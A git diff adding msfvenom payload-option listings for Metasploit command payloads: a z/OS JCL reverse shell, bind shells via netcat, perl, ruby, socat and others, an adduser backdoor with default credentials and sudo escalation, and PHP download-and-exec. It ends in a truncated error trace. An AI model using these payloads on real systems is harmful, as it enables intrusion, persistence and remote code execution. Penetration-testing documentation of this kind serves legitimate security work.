on z/OS which will exit and return 0. This + can be used as a template for other JCL based payloads + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + JOBNAME DUMMY yes Job name for JCL JOB card + NTFYUSR false yes Include NOTIFY Parm? + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-mainframe-reverse_shell_jcl.txt b/msfvenom/payload_options/cmd-mainframe-reverse_shell_jcl.txt new file mode 100644 index 0000000..d90afb6 --- /dev/null +++ b/msfvenom/payload_options/cmd-mainframe-reverse_shell_jcl.txt @@ -0,0 +1,49 @@ + + Name: Z/OS (MVS) Command Shell, Reverse TCP + Module: payload/cmd/mainframe/reverse_shell_jcl + Platform: Mainframe + Arch: cmd +Needs Admin: No + Total size: 8993 + Rank: Normal + +Provided by: + Bigendian Smalls + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ACTNUM MSFUSER-ACCTING-INFO yes Accounting info for JCL JOB card +JCLASS A yes Job Class for JCL JOB card +LHOST 0.0.0.0 yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +MSGCLASS Z yes Message Class for JCL JOB card +MSGLEVEL (0,0) yes Message Level for JCL JOB card +NOTIFY no Notify User for JCL JOB card +PGMNAME programmer name yes Programmer name for JCL JOB card + +Description: + Provide JCL which creates a reverse shell + This implementation does not include ebcdic character translation, + so a client with translation capabilities is required. MSF handles + this automatically. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + JOBNAME DUMMY yes Job name for JCL JOB card + NTFYUSR false yes Include NOTIFY Parm? + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-adduser.txt b/msfvenom/payload_options/cmd-unix-adduser.txt new file mode 100644 index 0000000..ec40697 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-adduser.txt @@ -0,0 +1,43 @@ + + Name: Add user with useradd + Module: payload/cmd/unix/adduser + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 153 + Rank: Normal + +Provided by: + Nick Cottrell + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +PASS Metasploit$1 yes The password for this user +USER metasploit yes The username to create + +Description: + Creates a new user. By default the new user is set with sudo + but other options exist to make the new user automatically + root but this is not automatically set since the new user will + be treated as root (and login may be difficult). The new user + can also be set as just a standard user if desired. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + RootMethod SUDO no The method to obtain root with the new user (Accepted: SUID, SUDO, NONE) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + + + When RootMethod is SUDO: + + Name Current Setting Required Description + ---- --------------- -------- ----------- + CheckSudoers true no Check if the sudoers file exists before modifying it + diff --git a/msfvenom/payload_options/cmd-unix-bind_awk.txt b/msfvenom/payload_options/cmd-unix-bind_awk.txt new file mode 100644 index 0000000..3548d90 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_awk.txt @@ -0,0 +1,32 @@ + + Name: Unix Command Shell, Bind TCP (via AWK) + Module: payload/cmd/unix/bind_awk + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 140 + Rank: Normal + +Provided by: + espreto + Ulisses Castro + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via GNU AWK + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_aws_instance_connect.txt b/msfvenom/payload_options/cmd-unix-bind_aws_instance_connect.txt new file mode 100644 index 0000000..bbc88a9 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_aws_instance_connect.txt @@ -0,0 +1,42 @@ + + Name: Unix SSH Shell, Bind Instance Connect (via AWS API) + Module: payload/cmd/unix/bind_aws_instance_connect + Platform: Unix + Arch: x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64 +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ACCESS_KEY_ID no AWS access key +EC2_ID yes The EC2 ID of the instance +INSTANCE_USER no Username on the EC2 instance with which to log-in +PASSWORD no EC2 instance local password to authenticate with +REGION us-east-1 yes AWS region containing the instance +ROLE_ARN no AWS assumed role ARN +ROLE_SID no AWS assumed role session ID +SECRET_ACCESS_KEY no AWS secret key +USERNAME no EC2 instance local username to authenticate with + +Description: + Creates an SSH shell using AWS Instance Connect + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand exit no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + KEY_PASS no Passphrase for SSH private key(s) + PRIVATE_KEY no The string value of the private key that will be used. If you are using MSFConsole, + this value should be set as file:PRIVATE_KEY_PATH. OpenSSH, RSA, DSA, and ECDSA private keys are supported. + SSH_DEBUG false no Enable SSH debugging output (Extreme verbosity!) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_busybox_telnetd.txt b/msfvenom/payload_options/cmd-unix-bind_busybox_telnetd.txt new file mode 100644 index 0000000..f426b31 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_busybox_telnetd.txt @@ -0,0 +1,33 @@ + + Name: Unix Command Shell, Bind TCP (via BusyBox telnetd) + Module: payload/cmd/unix/bind_busybox_telnetd + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 26 + Rank: Normal + +Provided by: + Matthew Kienow + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LOGIN_CMD /bin/sh yes Command telnetd will execute on connect +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via BusyBox telnetd + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand pkill telnetd yes A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + TelnetdPath telnetd yes The path to the telnetd executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_inetd.txt b/msfvenom/payload_options/cmd-unix-bind_inetd.txt new file mode 100644 index 0000000..981bb96 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_inetd.txt @@ -0,0 +1,33 @@ + + Name: Unix Command Shell, Bind TCP (inetd) + Module: payload/cmd/unix/bind_inetd + Platform: Unix + Arch: cmd +Needs Admin: Yes + Total size: 487 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell (persistent) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InetdPath inetd yes The path to the inetd executable + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ShellPath /bin/sh yes The path to the shell to execute + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_jjs.txt b/msfvenom/payload_options/cmd-unix-bind_jjs.txt new file mode 100644 index 0000000..10ce543 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_jjs.txt @@ -0,0 +1,34 @@ + + Name: Unix Command Shell, Bind TCP (via jjs) + Module: payload/cmd/unix/bind_jjs + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 795 + Rank: Normal + +Provided by: + conerpirate + bcoles + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address +SHELL /bin/sh yes The shell to execute + +Description: + Listen for a connection and spawn a command shell via jjs + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + JJSPath jjs yes The path to the JJS executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_lua.txt b/msfvenom/payload_options/cmd-unix-bind_lua.txt new file mode 100644 index 0000000..4e207b6 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_lua.txt @@ -0,0 +1,32 @@ + + Name: Unix Command Shell, Bind TCP (via Lua) + Module: payload/cmd/unix/bind_lua + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 218 + Rank: Normal + +Provided by: + xistence + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via Lua + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + LuaPath lua yes The path to the Lua executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_netcat.txt b/msfvenom/payload_options/cmd-unix-bind_netcat.txt new file mode 100644 index 0000000..84781a0 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_netcat.txt @@ -0,0 +1,35 @@ + + Name: Unix Command Shell, Bind TCP (via netcat) + Module: payload/cmd/unix/bind_netcat + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + m-1-k-3 + egypt + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via netcat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + NetcatPath nc yes The path to the Netcat executable + ShellPath /bin/sh yes The path to the shell to execute + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_netcat_gaping.txt b/msfvenom/payload_options/cmd-unix-bind_netcat_gaping.txt new file mode 100644 index 0000000..fc7db50 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_netcat_gaping.txt @@ -0,0 +1,33 @@ + + Name: Unix Command Shell, Bind TCP (via netcat -e) + Module: payload/cmd/unix/bind_netcat_gaping + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 24 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via netcat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + NetcatPath nc yes The path to the Netcat executable + ShellPath /bin/sh yes The path to the shell to execute + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_netcat_gaping_ipv6.txt b/msfvenom/payload_options/cmd-unix-bind_netcat_gaping_ipv6.txt new file mode 100644 index 0000000..ed807e6 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_netcat_gaping_ipv6.txt @@ -0,0 +1,33 @@ + + Name: Unix Command Shell, Bind TCP (via netcat -e) IPv6 + Module: payload/cmd/unix/bind_netcat_gaping_ipv6 + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 25 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via netcat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + NetcatPath nc yes The path to the Netcat executable + ShellPath /bin/sh yes The path to the shell to execute + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_nodejs.txt b/msfvenom/payload_options/cmd-unix-bind_nodejs.txt new file mode 100644 index 0000000..d0eafde --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_nodejs.txt @@ -0,0 +1,31 @@ + + Name: Unix Command Shell, Bind TCP (via nodejs) + Module: payload/cmd/unix/bind_nodejs + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 2239 + Rank: Normal + +Provided by: + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Continually listen for a connection and spawn a command shell via nodejs + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_perl.txt b/msfvenom/payload_options/cmd-unix-bind_perl.txt new file mode 100644 index 0000000..079bdc4 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_perl.txt @@ -0,0 +1,33 @@ + + Name: Unix Command Shell, Bind TCP (via Perl) + Module: payload/cmd/unix/bind_perl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 240 + Rank: Normal + +Provided by: + Samy + cazz + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via perl + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PerlPath perl yes The path to the Perl executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_perl_ipv6.txt b/msfvenom/payload_options/cmd-unix-bind_perl_ipv6.txt new file mode 100644 index 0000000..b5444d1 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_perl_ipv6.txt @@ -0,0 +1,33 @@ + + Name: Unix Command Shell, Bind TCP (via perl) IPv6 + Module: payload/cmd/unix/bind_perl_ipv6 + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 152 + Rank: Normal + +Provided by: + Samy + cazz + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via perl + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PerlPath perl yes The path to the Perl executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_r.txt b/msfvenom/payload_options/cmd-unix-bind_r.txt new file mode 100644 index 0000000..a5f9d9c --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_r.txt @@ -0,0 +1,32 @@ + + Name: Unix Command Shell, Bind TCP (via R) + Module: payload/cmd/unix/bind_r + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 132 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Continually listen for a connection and spawn a command shell via R + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + RPath R yes The path to the R executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_ruby.txt b/msfvenom/payload_options/cmd-unix-bind_ruby.txt new file mode 100644 index 0000000..916c15a --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_ruby.txt @@ -0,0 +1,32 @@ + + Name: Unix Command Shell, Bind TCP (via Ruby) + Module: payload/cmd/unix/bind_ruby + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 137 + Rank: Normal + +Provided by: + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Continually listen for a connection and spawn a command shell via Ruby + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + RubyPath ruby yes The path to the Ruby executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_ruby_ipv6.txt b/msfvenom/payload_options/cmd-unix-bind_ruby_ipv6.txt new file mode 100644 index 0000000..bd2e650 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_ruby_ipv6.txt @@ -0,0 +1,32 @@ + + Name: Unix Command Shell, Bind TCP (via Ruby) IPv6 + Module: payload/cmd/unix/bind_ruby_ipv6 + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 142 + Rank: Normal + +Provided by: + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Continually listen for a connection and spawn a command shell via Ruby + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + RubyPath ruby yes The path to the Ruby executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_socat_sctp.txt b/msfvenom/payload_options/cmd-unix-bind_socat_sctp.txt new file mode 100644 index 0000000..f7250fc --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_socat_sctp.txt @@ -0,0 +1,34 @@ + + Name: Unix Command Shell, Bind SCTP (via socat) + Module: payload/cmd/unix/bind_socat_sctp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 71 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CHOST no The local client address +CPORT no The local client port +LPORT 4444 yes The listen port +Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, http, socks4, socks5, socks5h +RHOST no The target address + +Description: + Creates an interactive shell via socat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_socat_udp.txt b/msfvenom/payload_options/cmd-unix-bind_socat_udp.txt new file mode 100644 index 0000000..adb43f4 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_socat_udp.txt @@ -0,0 +1,33 @@ + + Name: Unix Command Shell, Bind UDP (via socat) + Module: payload/cmd/unix/bind_socat_udp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 70 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Creates an interactive shell via socat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + BashPath bash yes The path to the Bash executable + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + SocatPath socat yes The path to the Socat executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_stub.txt b/msfvenom/payload_options/cmd-unix-bind_stub.txt new file mode 100644 index 0000000..fe0abde --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_stub.txt @@ -0,0 +1,31 @@ + + Name: Unix Command Shell, Bind TCP (stub) + Module: payload/cmd/unix/bind_stub + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell (stub only, no payload) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_zsh.txt b/msfvenom/payload_options/cmd-unix-bind_zsh.txt new file mode 100644 index 0000000..6d94168 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_zsh.txt @@ -0,0 +1,34 @@ + + Name: Unix Command Shell, Bind TCP (via Zsh) + Module: payload/cmd/unix/bind_zsh + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 99 + Rank: Normal + +Provided by: + Doug Prostko + Wang Yihang + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is + often available, please be aware it isn't usually installed by default. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + ZSHPath zsh yes The path to the ZSH executable + diff --git a/msfvenom/payload_options/cmd-unix-generic.txt b/msfvenom/payload_options/cmd-unix-generic.txt new file mode 100644 index 0000000..97e4fea --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-generic.txt @@ -0,0 +1,30 @@ + + Name: Unix Command, Generic Command Execution + Module: payload/cmd/unix/generic + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute + +Description: + Executes the supplied command + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-interact.txt b/msfvenom/payload_options/cmd-unix-interact.txt new file mode 100644 index 0000000..c8d77a1 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-interact.txt @@ -0,0 +1,25 @@ + + Name: Unix Command, Interact with Established Connection + Module: payload/cmd/unix/interact + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + hdm + +Description: + Interacts with a shell on an established socket connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-bind_php.txt b/msfvenom/payload_options/cmd-unix-php-bind_php.txt new file mode 100644 index 0000000..b91fb1a --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-bind_php.txt @@ -0,0 +1,36 @@ + + Name: PHP Exec, PHP Command Shell, Bind TCP (via PHP) + Module: payload/cmd/unix/php/bind_php + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 1258 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + diaul + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Listen for a connection and spawn a command shell via php + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-bind_php_ipv6.txt b/msfvenom/payload_options/cmd-unix-php-bind_php_ipv6.txt new file mode 100644 index 0000000..6959dc6 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-bind_php_ipv6.txt @@ -0,0 +1,36 @@ + + Name: PHP Exec, PHP Command Shell, Bind TCP (via php) IPv6 + Module: payload/cmd/unix/php/bind_php_ipv6 + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 1254 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + diaul + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell. + + Listen for a connection and spawn a command shell via php (IPv6) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-download_exec.txt b/msfvenom/payload_options/cmd-unix-php-download_exec.txt new file mode 100644 index 0000000..255b2cc --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-download_exec.txt @@ -0,0 +1,28 @@ + + Name: PHP Exec + Module: payload/cmd/unix/php/download_exec + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 1276 + Rank: Normal + +Provided by: + Spencer McIntyre + msutovsky-r7 + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +URL yes The pre-encoded URL to the executable + +Description: + Execute a PHP payload as an OS command from a Posix-compatible shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-php-exec.txt b/msfvenom/payload_options/cmd-unix-php-exec.txt new file mode 100644 index 0000000..4aa0ccb --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-php-exec.txt @@ -0,0 +1,10 @@ +Options for payload/cmd/unix/php/exec: +========================= + +/usr/share/metasploit-framework/modules/payloads/singles/php/exec.rb:35:in `php_exec_cmd': undefined 